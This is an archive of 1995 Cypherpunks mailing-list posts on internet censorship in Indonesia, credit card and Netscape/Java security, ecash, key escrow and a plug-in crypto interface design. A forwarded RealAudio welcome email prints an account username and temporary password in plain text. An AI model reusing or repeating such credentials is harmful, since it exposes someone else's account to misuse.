   nalists are jailed and unlicensed magazines banned. 
 
   Internet users doubt the Indonesian government can legis- 
   late or control the Internet, short of pulling the plug on the 
   nation's soon-to-be-privatised phone system. 
 
Please note that the expression "legislate or control" means 
control by either fraud or force, whichever the military finds 
most convenient. 
 
If the military does one day pull the plug, will that validate or 
invalidate the statement in the "Welcome to cypherpunks" document-- 
 
     Cypherpunks know that a widely dispersed system can't 
     be shut down. 
 
A tangential answer is supplied by Indonesian activists: 
 
   Despite the technical and administrative hurdles with cen- 
   soring an increasingly large volume and web of contacts, 
   Internet users point out such a scheme [of censorship, 
   not plug-pulling] would not stop the increasing distribution 
   of material within the country. 
 
For there are private as well as commercial networks in the 
country. 
 
   Commercial providers' estimates suggest there are around 
   10,000 registered local users, with popularity of the 
   Internet growing among Indonesia's technological and edu- 
   cated elite.... 
 
Please note the expression "registered local users," and re- 
call the military's 
 
         suggested registering [of] uses and users 
 
 
Uses?  Perhaps that means those nominally private networks. 

 
 
             Cypherpunks hope that all people desiring privacy 
             will learn how best to defend it. 
 
                                      --Welcome to cypherpunks 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.   NandO News, which posted the above newsstory, 
        can be accessed at: 
 
                       http://www.nando.net 
 
        The story's online filename is: 
 
                          info733_8.html 
 
        It's datelined: 
 
                 JAKARTA (Nov 16, 1995 - 01:06 EST) 
 
 







From anonymous-remailer at shell.portal.com  Fri Nov 17 15:57:19 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 18 Nov 1995 07:57:19 +0800
Subject: credit card conventional wisdom
Message-ID: <199511172312.PAA22826@jobe.shell.portal.com>


Alice here ...

On Wed, 15 Nov 1995, Howard Melman wrote:

> Vladimir Z. Nuri wrote: 
> > attempts to get secure credit card number transfer on the internet are
> > not an end in themselves. they are the first steps toward an entirely
> > new transaction system. those who see a single step and criticize it 
> > as feeble in the context of past systems are missing the point and
> > apparently can't think past the present nanosecond of their lives. 

My grandfather used to say, that the first horse to break from the gate,
isn't necessarily the first to cross the finish line. 

Often, he'll be pulling up the rear.

> You'll have a hard convincing folks that they need something
> better than what works perfectly well today.

In my humble opinion, the present system can't really be characterized as
"working perfectly well".  Far from it.  

While not as familiar with the US system as the Canadian, I can give as a
simple example, the bank clearing system for paper checks.  In Canada, we
can clear a check from one side of the country to the other overnight.  We
have 24 hour clearing.  While this is far from "perfect", our existing
paper systems allow for a degree of efficiency which I don't believe is
engineered into the US clearing system. 

Perhaps someone can correct me, if I have erred but I think it takes far
longer than 24 hours to clear a check drawn on any US bank, and deposited
to any other bank's credit in the United States.  It may work
"functionally" ... but certainly far from "perfectly" nor "efficiently". 

> Here's another point that I didn't see in your list.  Today it might be
> just as safe to send your CC# over the internet as giving it to a clerk,
> etc.  This is mostly because the number of CC#'s sent over the net vs 
> the whole traffic is small.  It is therefore not very cost effective to
> try to steal credit card numbers over the net vs other means (searching
> through dumpsters, taping a phone line near LL Bean, etc.). 

A very good point.  But then, dumpster-diving attacks could be moderated
by simply implementing carbonless forms.  No carbon, reduces a lot of the
risks.  It's basic risk management. 

All of this becomes a part of the cost/benefit analysis, and is part of
the function of security policy.  It's very much like all the talk on
another thread on this list about Java security. 

There is no point in even discussing Java security in Netscape, when
Netscape PRESENTLY has existing security holes written into the very
fabric of the existing installed codebase.  Holes which Netscape and AT&T
refuse to address, correct or even comment on. 

Sun's security approach misses the point.  Putting dead-bolts on houses
while leaving all of the windows open, just doesn't address the problem. 
It really misses the mark. 

> If CC# purchases became common over the net, it would become much more
> valuable to try to steal them from the net and more people would.  It
> would then become much less secure, not for any technical reason but
> because there will be more crooks exploiting the existing flaws. 

This is also unfortunately true.  Information on how to "break" a system
does propagate.  As more people know how to exploit a system, or as more
people learn how to utilize the "letter of the rules" (the "code") rather
than the "spirit" (the "intent") the degree of exploitation grows. 

Ask any executive in the Gaming Industry about this.

Black-Jack card-counting went through an evolution in exactly this
fashion.  Many casinos lost a veritable "fortune" to good card counters. 
They lost to organized "teams" of card counters.  Counters who literally
broke the bank. 

Systems always have exploitable features.  And new systems will always
present new opportunities for exploitation. A completely new set of risks
which are additive to those already in place, even those which may not 
yet be in a state of active exploitation.

A pertinent network example: credit card numbers.

Credit card numbers are not just a set of random digits.  Only particular
patterns of numbers can be valid.  This existing "security provision" --
check digits -- actually ends up opening a security hole when we look at
transmitting credit card numbers via the Internet. 

The security feature on one side of the ledger makes it far easier to
differentiate between what is a random set of numbers, and what is in fact
a valid CC number.  Simple pattern analysis allows to search for valid
numbers.  

It makes the potential "crooks" job much easier and its already engineered 
into the system.  

The "credit card number" risk though is accidental, while the Netscape
Navigator risk isn't accidental at all, it's willful. 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.










From anonymous-remailer at shell.portal.com  Fri Nov 17 16:04:27 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 18 Nov 1995 08:04:27 +0800
Subject: credit card conventional wisdom
Message-ID: <199511172322.PAA23877@jobe.shell.portal.com>


Alice here ...

On Thu, 16 Nov 1995, Vladimir Z. Nuri wrote:


> but one distinction I do realize has to be made in all this is the
> difference between "fraud" and "breaking a system". the latter is
> a far more potentially serious problem with cryptographic security than
> the former. in fact cryptographic security attempts to deal with all
> fraud by making "breaking the system" impossible, and succeeds to the
> degree it accomplishes this.

I think this is extremely important to consider.  The functions which
define relationships between large numbers of variables, (such as say the
world economy) -- these functions are not "idiot proof". 

They can collapse.  And, yes Virginia, the system can be "broken".

To suggest that cryptography can address this issue is to misunderstand
the problem, and is part of this whole mindset that "security" is
cryptography. 

Our economies are, if anything, less resilient than they were in the not
to distant past.  They are far more vulnerable.  The introduction of new
business practices, such as the reduction in most firms inventories, and
the ever greater reliance on "just in time" approaches has made us far
less able to sustain any interruption. 

The headlong introduction of "new variables" and new vectors into an
unstable system has never been "sound policy".  

I guess it's sort of like what happened when rabbits were introduced into
Australia.  An eco-catastrophe. 

Perhaps, we can all agree that existing systems are best "not
destabilized".  Then again, I'm not the one who gets his jollies by
rocking the boat.  I get mine elsewhere.

I guess here then is the real question, what is the fallback plan when 
something does go catastrophically wrong??  What then, hand-wringing, and 
saying that it "exceeded our theoreticians predictive capabilities" just 
does not suffice.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









From perry at piermont.com  Fri Nov 17 16:04:51 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 18 Nov 1995 08:04:51 +0800
Subject: No Privacy Right in UK ?
In-Reply-To: <Pine.BSD.3.91.951117174809.9898L-100000@ahcbsd1.ovnet.com>
Message-ID: <199511172316.SAA13692@jekyll.piermont.com>



"James M. Cobb" writes:
> Thanks for your inquiry.  The post "No Privacy Right in UK ?" 
> is closely related to cryptography in at least three ways. 

Actually, I was being rhetorical. It was an inappropriate posting.

> Cryptography is a means to accomplish an end: privacy.

Thats true, but it isn't a means to keep private investigators from
noticing that insurance cheats are perfectly healthy when they claim
to be horribly incapacitiated, which was what the article was about.

> Farther, the case discussed in the post was a prosaic example 
> of invasion of privacy by deception.

Actually, it was a prosaic example of the lengths to which human
stupidity is taken in our court systems. I'm reminded of the rule that
says you can't put a boobytrap in your home -- after all, a person
breaking and entering could injure themselves with it.

It has nothing to do with cryptography, though.

> Further, Clinton attended an elite university in the UK.  Can you 
> imagine what notions he may have found attractive there?

So what. Nothing to do with cryptography.

Take this elsewhere, I say.

Perry





From edge at got.net  Fri Nov 17 16:13:28 1995
From: edge at got.net (Jay Campbell)
Date: Sat, 18 Nov 1995 08:13:28 +0800
Subject: COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
Message-ID: <199511172357.PAA03710@you.got.net>


>COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
>
>Community ConneXion today announced that it has become the first and
>only Internet Service Provider in the world to allow for payment using
>ecash, a digital cash system developed by DigiCash bv, of Amsterdam,

And, er, we're second. Ditch that 'only' part :)
--
   Jay Campbell                edge at got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay at Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."






From anonymous-remailer at shell.portal.com  Fri Nov 17 16:36:19 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 18 Nov 1995 08:36:19 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511180014.QAA29549@jobe.shell.portal.com>


On Wed, 15 Nov 1995, Bill Stewart wrote:

> >>Does anyone know the ostensible justification for this?  
> 
> Isn't the NCSA government-funded?  If so, they've probably got
> less slack in what they can get away with than private citizens;

I think that government-funding does give a certain degree of control --
the control that comes with the budget axe.  Private citizens
alternatively, get to face a different type of tool. 

They get to face stuff like RICO provisions, which "effectively" -- as
they are presently used, rather than as they were written and intended to
be used -- tend to allow the government to "influence" private citizens. 

> the NSA's got more leverage over their funding, especially if
> "Supercomputer Applications" are often military or civilian-govt.

I doubt that the NSA approves the NCSA's budget.

Far more likely would be for the NSA to use a rogue programmer at the
NCSA.  Someone who might hide some very damaging code into one of the
existing applications without anyone (else) knowing about it. 

I could even see an independent doing this simply to profit from it.  I
could see someone doing something like that.  It's no different really
than the "free" programs that were given away years ago which appeared to
be useful but actually contained "poison code". 

> Not only do they have to worry about ITAR as law, they have to
> worry about their continued cash flow.

Like I said, I don't believe in the "grand conspiracy" model.  I tend
toward "contained" enterprises. 

All the more reason though, NEVER to use black-box code, and all the more 
reason for public open review of code.  NSA and ITAR aside ... safe 
computing is safe computing and is in everyone's collective interest.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From dlv at bwalk.dm.com  Fri Nov 17 17:09:02 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 18 Nov 1995 09:09:02 +0800
Subject: Java & Netscape security  [NOISE]
In-Reply-To: <9511171814.AA23432@alpha>
Message-ID: <4qiqeD22w165w@bwalk.dm.com>


m5 at dev.tivoli.com (Mike McNally) writes:
> Frederick B. Cohen writes:
>  > This is baloney.  When you work for Netscape or Sun and speak about your
>  > company's products, you are representing the company whether you
>  > disclaim it or not.
>
> Baloney.

Fred is right. I used to work for Goldman Sachs & their internet usage policy
stated that when you write to Internet or Usenet from a GS account, it will
reflect on the firm no matter how you disclaim it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From jsw at netscape.com  Fri Nov 17 17:22:37 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Sat, 18 Nov 1995 09:22:37 +0800
Subject: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <30ABB66D.3492@netscape.com>


Dr. Frederick B. Cohen wrote:

[ quoted comments from mrm at netcom.com (Marianne Mueller) removed ]

> It seems clear from this that Netscape, or at least Marianne who seems
> to speak for Netscpe, doesn't understand the protection issues that my
> clients face.  I will nevertheless forward this official Netscape line
> to them so they can better understand why I tell them it is insecure.

  Ahem.  mrm at netcom.com is not a Netscape employee.  netcom.com is not
the same as netscape.com.  Marianne is a Sun employee, who is working
on Java.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From stewarts at ix.netcom.com  Fri Nov 17 17:30:24 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 18 Nov 1995 09:30:24 +0800
Subject: No Privacy Right in Indonesia ?
Message-ID: <199511180111.RAA12769@ix6.ix.netcom.com>


At 05:54 PM 11/17/95 -0500, "James M. Cobb" <jcobb at ahcbsd1.ovnet.com> wrote:
>An 11 17 95 Reuter Information Service newsstory headlined 
>     Politics, not sex, is Indonesian Internet's concern 
...
>   Activists in Indonesia who use the Internet say it is a power- 
>   ful tool for distributing information in a society where self- 
>   censorship abounds, newspapers are tightly controlled, jour- 
>   nalists are jailed and unlicensed magazines banned. 

The primary difference between Indonesian and Singaporean censorship
is that the Singaporeans are a lot more urbane about it, and generally
don't have crowds of protestors to shoot at.  Reporting on the East Timor
activity is an especially good way to get kicked out of the country;
I know people it's happened to.  Uncensorable communications can be
a substantial help, though rubber-hose cryptanalysis is still fairly
effective, and it's the type of place that would use it.

A certain amount of US activism on the East Timor problems is Internet-based;
I don't know how connected it is to Indonesia or East Timor, which is
too underdeveloped to be very active on the net, and has the added problem
that activists are heavily watched.

The Indonesian military recruitment process is unfortunately not something
that crypto can affect much, except by keeping political activist's identities
private so they're not targets.  Basically, the draft board knocks on your
door and says "Uncle <whoever> wants _you_", and they're authorized to shoot you
if you don't cooperate, though they're also authorized to not shoot you.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From ddt at lsd.com  Fri Nov 17 17:31:27 1995
From: ddt at lsd.com (Dave Del Torto)
Date: Sat, 18 Nov 1995 09:31:27 +0800
Subject: [BOOK] "SPYWORLD" (was: Re: CSE gets flak on TV)
Message-ID: <v03003d00acd17b14cfc4@[129.46.82.80]>


In Reply to the Message wherein it was written:
>On Tue, 14 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:
>
>>  Electronic snooping part of the game
>>
>>  OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's
>>  high-tech spy agency snoops on friendly countries for financial gain.
>
>No big secret??  It was news to me. ;-)                        [elided]

Dear Alice,

To the few on the list who have not already had the pleasure, I'd put
"SPYWORLD" in the "Puzzle Palace" category of must-reads. Before recently
leaving our own Wunderland for a course in advanced bird-watching off in
the Canary Islands, Michael Sattler was kind enough to loan me his
hardcover of this pithy little 1994 history/expose on the Canadian spook
community by one of their first key propeller-heads, "Mike Frost." After
being unceremoniously dumped by the Canucks a few years back, he decided to
"share" about it all to work out his frustrations. Though I assume it was
'tidied up' by various government censors in pre-publication, and according
to the inside page was printed and "bound in the U.S.A." ;), I must say it
was nevertheless an arousing read, albeit a bit nit-sloppy with the ghost
writing/editing here and there.

It paints a colorful picture of the TLA gang-bang that resulted in the
conception of the Canadian black budget intercept operations. The potent
schtuppingvermachen of the American and British, each waiting patiently for
sloppy seconds is, to say the least, pruriently fascinating. "Frost"
manages to (un)cover, in pleasurably lurid detail, some of the tools used,
and policies openly violated, during such intercepts as "Stephanie" in
Moscow. There are even some descriptions of the scenes behind the green
doors of the NSA and CIA. Frankly, all it really lacks is a nude picture of
the American Ambassador in Ottowa pulling his pants up _before_ drawing the
shades for the last time. If you do read it, use protection.  ;)

"SPYWORLD"
 Subtitle: Inside the Canadian and American Intelligence Establishments
 By: "Mike Frost" as told to Michel Gratton
 ISBN 0-385-25494-6
Publisher:
 Doubleday Canada Ltd.
 105 Bond Street
 Toronto, Ontario
 M5B 1Y3


   dave

PS: Don't worry, Mike, none of the pages stick together. :)


_______________________________________________________________________
"If you're ever robbed of your virtue, trust me: it was an inside job."







From cme at TIS.COM  Fri Nov 17 17:51:46 1995
From: cme at TIS.COM (Carl Ellison)
Date: Sat, 18 Nov 1995 09:51:46 +0800
Subject: Dec 5th KE meeting details
Message-ID: <9511172033.AA09548@tis.com>


Date: Mon, 13 Nov 1995 13:15:32 -0500
From: Elaine Frye <frye at micf.nist.gov>


November 8, 1995


To:  Key Escrow Distribution Lis

From:  Ed Roback, NIST

Subject:  Planning for December 5th Meeting

At the September 6-7, 1995 key escrow issues meeting, I received a number of
comments that the government presentations should have addressed more topics
in greater detail.  To respond to this concern, I would like to request
submissions of any specific questions/issues related to the draft criteria
that you would like to see addressed on December 5th.  I cannot guarantee we
can meet all requests, but your suggestions will greatly help in planning
the meeting agenda and government presentations.

Please forward your questions/issues/ideas to me via e-mail at
"edward.roback at nist.gov", fax at 301-948-1784 or telephone on 301-975-3696.  

FYI, the current outline for the December 5 meeting is as follows:

A.      Government presentation of draft criteria, followed by Q&As

B.      Industry presentations on draft criteria

C.      Breakout sessions on criteria
          (a suggestion has been made to also have one on policy issues)

D.      Reports from breakout sessions

E.      Wrapup

Remember, also, that if you would like to make a presentation at the
meeting, you are asked to contact Elaine Frye at "elaine.frye at nist.gov".
You may also bring written comments to the meeting for distribution (our
estimate is that 250 copies are necessary.)

Thank you.
*****************************************************
Elaine Frye
Computer Systems Laboratory, NIST
Bldg. 225/Rm.B154
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1784
*****************************************************







From wiltship at iccu6.ipswich.gil.com.au  Fri Nov 17 18:11:54 1995
From: wiltship at iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Sat, 18 Nov 1995 10:11:54 +0800
Subject: credit card conventional wisdom
Message-ID: <199511180157.MAA13155@iccu6.ipswich.gil.com.au>


You wrote...
>While not as familiar with the US system as the Canadian, I can give as a
>simple example, the bank clearing system for paper checks.  In Canada, we
>can clear a check from one side of the country to the other overnight.  We
>have 24 hour clearing.  While this is far from "perfect", our existing
>paper systems allow for a degree of efficiency which I don't believe is
>engineered into the US clearing system. 

Here in Australia most banks take 5 working days to clear a cheque.. even if
it's deposited at a bank just up the road from drawer's bank.

cheers

Peter







                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship at gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10






From ahupp at primenet.com  Fri Nov 17 19:43:12 1995
From: ahupp at primenet.com (Adam Hupp)
Date: Sat, 18 Nov 1995 11:43:12 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511180319.UAA07399@usr5.primenet.com>


>From: Scott Brickner <sjb at universe.digex.net>
>Date: Thu, 16 Nov 1995 15:13:27 -0600
>Subject: Re: NSA, ITAR, NCSA and plug-in hooks. 

>The problem is that the non-encryption program must use the same
>interface as the encryption program.  Text compression is often cited
>as an example of a non-encryption program that can use the same hooks
>as a compression program, but there's a key difference:  the text
>compressor *doesn't* need a key.
>
>The encryption tool would have an interface like
>    Boolean (*)( DataSource, DataSink, void*);
>
>A compressor written to the same interface would never need to touch
>that third argument.  Therefore, the second argument is "specifically
>designed" to permit an encryption tool to be used.
>
>You'd need a program which not only *accepted* the additional parameter,
>but also *needed* the second parameter.  I confess I have some difficulty
>thinking of one.
>

PKZIP allows encryption (other's ?).  How about a hook to that?

_____________________________________________________________

"We work in the dark  We do what we can  We give what we have
Our doubt is our passion  And our passion is our task   
The rest is the madness of art."  
                   --Henry James
___________________________________________________________






From welcome at realaudio.com  Fri Nov 17 19:48:47 1995
From: welcome at realaudio.com (RealAudio Welcome Wagon)
Date: Sat, 18 Nov 1995 11:48:47 +0800
Subject: RealAudio website TEMPORARY PASSWORD
Message-ID: <199511180309.TAA07665@www.realaudio.com>


This is an automatic response to your request for a free user account 
on the RealAudio site. Welcome to the world of RealAudio. 

Please do the following:
1. Go to http://www.RealAudio.com/welcome.html
2. Enter the following:

          Username: cpunks 
TEMPORARY Password: New.Norfolk

3. Choose your personal, PERMANENT password for the World of RealAudio

If you have trouble with the software, please refer to
 the RealAudio FAQ and Technical Notes available at
 http://www.RealAudio.com/help.html

You can also contact us through http://www.RealAudio.com/comments.html
Thanks for using RealAudio!
Progressive Networks, Seattle, Washington, USA





From jimbell at pacifier.com  Fri Nov 17 19:56:28 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 11:56:28 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <m0tGdxc-00090gC@pacifier.com>


>jim bell writes: [re: payee anonymity]
>> It seems to me that this should be possible, within limits, if the potential
>> payee could generate a "blinded" note to be delivered to the payer by
>> anonymous means.  The payer could get the note certified by the bank,
>> possibly given an extra "blind" if necessary  (is this possible? Desirable?
>> Why not?) and then the resulting still-blinded but certified note is posted
>> (in encrypted form, I supposed) to the 'net so that only the payee can
>> decrypt and unblind it.
>
>This sounds like a version of "Hey, I'll pay you $10, if you give me a ten
>dollar bill first." As I understand your protocol, Bob gives Alice an enote,
>then Alice gives Bob an enote. Alice isn't paying Bob in any meaningful sense,
>since Bob ends up with the same amount of e$ with which he started. Perhaps
>you could clarify what you meant.

It sounds like you understand even less about the details of digital cash
than I do.

First, read the August 1992 issue of Scientific American, the article by
David Chaum.  He explains, with a certain amount of detail, how blinded
digital cash operates.  To become validated and worth money, it first has to
be electronically "written," blinded, and then signed by the bank.  Then it
is unblinded, at which point it can be spent.  

What I was saying is that the notes would be written by the payee, then
blinded by the payee, given to the payer, and then signed by the payer's
bank.  At this point, they are worth money, and they are then returned to
the payee, possibly by encrypting them and publishing them in encrypted form
on a publicly-accessible portion of the Internet, so "anyone" could read
them.  Only the intended payee would be able to decrypt them, however, and
only the payee would be able to unblind the notes.






From anonymous-remailer at shell.portal.com  Fri Nov 17 20:01:46 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 18 Nov 1995 12:01:46 +0800
Subject: Ecash account
Message-ID: <199511180326.TAA18869@jobe.shell.portal.com>


On Fri, 17 Nov 1995 don at cs.byu.edu wrote:

> So who here is going to use their ecash account to set up a money
> lau^H^H^Hexchange service?

Oh boy.  Not this argument again.  The one that says that if someone 
makes "change" that its money laundering.  *Sigh* I suppose it is, if 
that's the way you're going to look at it.  On that basis, every time I 
go to the corner grocery, I'm "laundering" my money.  So be it.

And I suppose if I put aside a small "nestegg", that then I've got
something to hide as well?? 

> Ob Cyphernoise: Would Dr Fred, Alice, and any other names LD has set up
> for himself lately please keep the noise limited to email? Please?

I too am tired of LD spoofing me.  But I am not going to actively "deny" 
every one of his posts.  It's just not worth it.

Hopefully the people on this list can tell the difference between what I 
stand for, and what certain people would like to paint me as standing for.

As I've said, and repeated, my only interests lie in E-cash, and in
removing code from the Internet which opens up security holes.  Software,
like Netscape Navigator and Java. 

The rest ... or anything else that someone tries to paint me as "standing 
for" is simply juvenile antics. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From attila at primenet.com  Fri Nov 17 20:10:38 1995
From: attila at primenet.com (attila)
Date: Sat, 18 Nov 1995 12:10:38 +0800
Subject: rape in the gulch (was Noyce and Intel)
In-Reply-To: <199511172211.RAA12522@pipe3.nyc.pipeline.com>
Message-ID: <Pine.BSD.3.91.951118034854.20818C-100000@usr6.primenet.com>



   that's why we call them vulture capitalists.  I know a few who would 
sell their own mother, several times, even after she died. I think Rock, 
Perring, the Davises, and a few more were gentlemen; but, as a group they 
certainly do not deserve much respect after each pact they make with the 
devil.  Once the big banks and insurance funds started supplying the 
underlying capitalization, the whores really moved in and made it what I 
refer to as evil money.

   you dont need to believe the New World Order is calling the shots to 
see where the banks are coming from.

On Fri, 17 Nov 1995, John Young wrote:

> Worth magazine of Dec/Jan has a lubricious article on "The 
> Super Investors of Silicon Valley":
> 
> 
> " 'Rise of the Silicon Patriots,' by Donald Katz. If their egos 
> and paychecks are oversized, so is their impact on the economy 
> and culture. It's not for nothing that California's venture 
> capitalists think they're at the center of the universe."
> 
> 
> It traces some of the mauling by rapacious VC tigers of unwary 
> techno-bambis and gleefully vaunts winner-take-all when the 
> chips are down (multiple puns there) -- commensurate with the 
> flatulent flattering flummoxing of this "financial 
> intelligence" oilslicker.
> 
> 
> For more FFF FinInt organ-grinding the monkeys, see 
> "Downloading Warren Buffet's Brain."
> 
> 
> 





From dsmith at midwest.net  Fri Nov 17 20:28:36 1995
From: dsmith at midwest.net (David E. Smith)
Date: Sat, 18 Nov 1995 12:28:36 +0800
Subject: [NOISE] Review: GoldenEye
Message-ID: <199511180406.XAA18908@bb.hks.net>


-----BEGIN PGP SIGNED MESSAGE-----

Just got back from the new Pierce-Brosnan-as-007 flick.
It had a few typical "hacker" stereotypes, and a couple
of interesting crypto relevant references.

* Boris, the stereotypical hacker, was hacking through American
banks.  A screen had the words "Department of Justice" and the
DoJ logo; underneath were the words "Clipper Chip" and a list
of banks.

* The archvillian's plan involved a massive money transfer and
an EMP pulse; he very briefly explained the effects of what
would happen if every computer in London were rendered non-
functional.  Possible crypto-anarchy bits.

* Boris should learn the value of strong passphrases.  His
password for the massive mainframe which will be used in the
archvillain's scheme is a five-letter dictionary word, which
didn't change (and it was used on two different computers),
and he revealed it indirectly (it was a word puzzle).

* A few on-computer-screen references to "encryption".

* Boris and the mastermind kept bantering about "breaking codes."

* Boris' computer in Russia - in his apartment - has a domain
ending in ".comp.math.edu"; when his screen lights up with
the words "INCOMING EMAIL" he goes into a live chat (complete
with graphics).

Above-average action/adventure flick.  The technical mistakes are
forgiveable in the interest of dramatic license.  Don't watch
it for the techno/crypto bits, though.  Watch it because lots
of things blow up :)

Dave----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(314)339-3814, "dsmith at midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMK1btCoZzwIn1bdtAQFmOgF/ZLYc3sT1L5sQS+wqmS5U6wsx9jL86job
Ie6DU65FIuSZF6vFDBDNZFxZxs0HuaR6
=5PGz
-----END PGP SIGNATURE-----





From jimbell at pacifier.com  Sat Nov 18 14:36:10 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 18 Nov 95 14:36:10 PST
Subject: protecting against impersonation (was: CANADIAN PRESS REPORTS)
Message-ID: <m0tGv2j-0008zeC@pacifier.com>


>anonymous writes:
>> I still feel such a sense of violation with what LD did, such an
>> utter sense of helplessness at the character assassination I've
>> suffered at his hands, 
>
>So use PGP, sign your messages.  Simple solution.

Absolutely!  Anybody who uses anonymous remailers to post to public areas,
and does not use digital signatures to prevent spoofing when it is obviously
needed, is a fool or worse.







From aleph1 at dfw.net  Sat Nov 18 00:32:04 1995
From: aleph1 at dfw.net (Aleph One)
Date: Sat, 18 Nov 1995 16:32:04 +0800
Subject: SA: Confidential Communication on the Internet
Message-ID: <Pine.SUN.3.90.951117010848.21461A@dfw.net>


On the December issue of Scientific American there is an article
by Thomas Beth, "Confidential Communication on the Internet".
Lite on the technical side but good reading anyway.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From raph at c2.org  Sat Nov 18 00:57:26 1995
From: raph at c2.org (Raph Levien)
Date: Sat, 18 Nov 1995 16:57:26 +0800
Subject: Design proposal: crypto-capable generic interface
Message-ID: <199511180842.AAA06560@infinity.c2.org>


Hi to cypherpunks who write code,

   The recent discussion of "plug-in" crypto is reminding me of some
design work I did earlier this year. This post presents the motivation
and some of the details of that design, slightly updated.

   First, a few words about what I consider to be good interface that
can support plug-in crypto. It has to support both email and the Web;
I feel that everything else follows. It should support completely
transparent integration, by which I mean no extra clicking or commands
or anything like that. Finally, it should be generic in that it will
support a number of other plug-in applications besides
cryptography. Two specific applications which interest me are file
format conversions and external-body resolving.

   The design is based partly upon .mailcap, which is perhaps the best
example of a generic interface we have today. However, while .mailcap
is a nice interface for popping up windows to present semi-interesting
multimedia types, it certainly cannot support transparent
cryptography. I feel that its primary weakness is the inability to
support MIME to MIME rewriting. However, .mailcap has some good ideas
which are worth stealing.
   For the purposes of this proposal, I will assume that all objects
are MIME encapsulated. I think that's a reasonable assumption, as it
handily covers all cryptographic protocols that have any hope of
surviving.

   I will propose my design at a very high level. Please forgive me
for leaving out the juicy details.

   I propose that the new interface lives as a sort of daemon, rather
than a static collection of command line script pieces. A reasonable
way for applications to talk to the daemon would be Unix domain
sockets, or whatever the equivalent is on Mac and Windows
platforms. There should be a simple protocol for automatically
starting up a daemon if there isn't one already running.

   The first part of the interface is the negotiation. The daemon
tells the application what MIME types it can understand (this part is
very similar to the .mailcap file, but doesn't include the
corresponding command lines). In reply, the application tells the
daemon what MIME types it can understand (this is like the
Http-Accept: field in HTTP).

   Once the negotation has been established, the application can send
the daemon MIME objects that the app does not understand but the
daemon does (for example, an image/fractal). The daemon can return a
MIME object that the app does understand (for example, an image/ppm).

   Alternatively, the daemon may request an authentication. This is
useful when resolving external bodies that require authentication,
including non-anonymous FTP, and standard authenticated HTTP. In this
case, the daemon sends a message to the app requesting the
authentication. It specifies whether it needs both username and
password, or just password. In the latter case, it hands a username to
the application.
   The application can then query the user for the authentication
data. It hands this back to the daemon. In reply, the daemon indicates
success or failure. In case of success, it hands the object back to
the app.

   I'm quite pleased with this protocol as outlined. It's fairly
simple, which means it might actually get implemented. It's also easy
to see that it does exactly what you want for file format conversions,
external body resolving, and decryption of encrypted messages.

   Encryption is a bit more tricky, but in essence you just hang a
premail-alike off this kind of protocol. The hard part is specifying
the key, but you just call it a "parameter" and put in hooks for the
daemon to ask for whatever parameters it needs. This requires that
keys have some nonforgeable names, which is unfortunately not a
feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
Certifcation Authority (<wink> at Nick Szabo).

   One final aside: I've been fairly frustrated with this mailing list
as a forum for talking about real design proposals and implementation
